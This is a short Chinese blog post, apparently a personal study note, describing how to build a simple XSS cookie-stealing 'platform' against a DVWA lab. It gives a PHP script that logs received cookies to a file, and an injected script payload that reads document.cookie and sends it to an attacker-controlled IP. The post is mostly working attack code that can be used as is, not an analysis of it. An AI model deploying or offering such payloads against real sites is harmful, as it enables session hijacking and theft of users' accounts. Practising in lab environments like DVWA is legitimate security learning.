这两天在看xss的东西,学习了如何搭建xss平台,在这里做个记录吧。
首先进入到原先虚拟机里搭建好的dvwa网站测试平台,开启low安全模式后就来搞一搞xss了
在网址后面加上<script>alert(1)</script>,回车后弹窗说明存在xss漏洞
得知存在漏洞后我们可以利用自己搭建的平台来盗取cookie值(首先是搭好自己的网站啦,PHPstudy、wamp什么的都行)
在网站根目录下创建一个getcookie.php文档,写入如下代码
<?php //cookie接受脚本 $cookie = $_GET[‘c‘]; echo $cookie; $file=fopen("cookie.html","a+");//打开一个句柄,准备写入,‘a+’指的是以追加的方式写入 fwrite($file,$cookie);//把cookie值写入文件中 fwrite($file,"<hr>"); fclose($file);//关闭句柄 ?>
这个页面会自己创建一个cookie.html页面,并将盗取的cookie值写入其中
然后构建一个xss语句来触发连接这个页面
<script>var a=document.cookie;window.open("http://x.x.x.x/getcookie.php?c="%2Ba);</script>
把这个语句加入到存在xss的页面中就可以了(语句里的x.x.x.x是自己的ip地址),这条语句就会链接到上面的getcookie页面
这样一个简易的盗取cookie的xss平台就建好了
本文出自 “UntitledZ” 博客,谢绝转载!
原文:http://untitledz.blog.51cto.com/8579898/1862777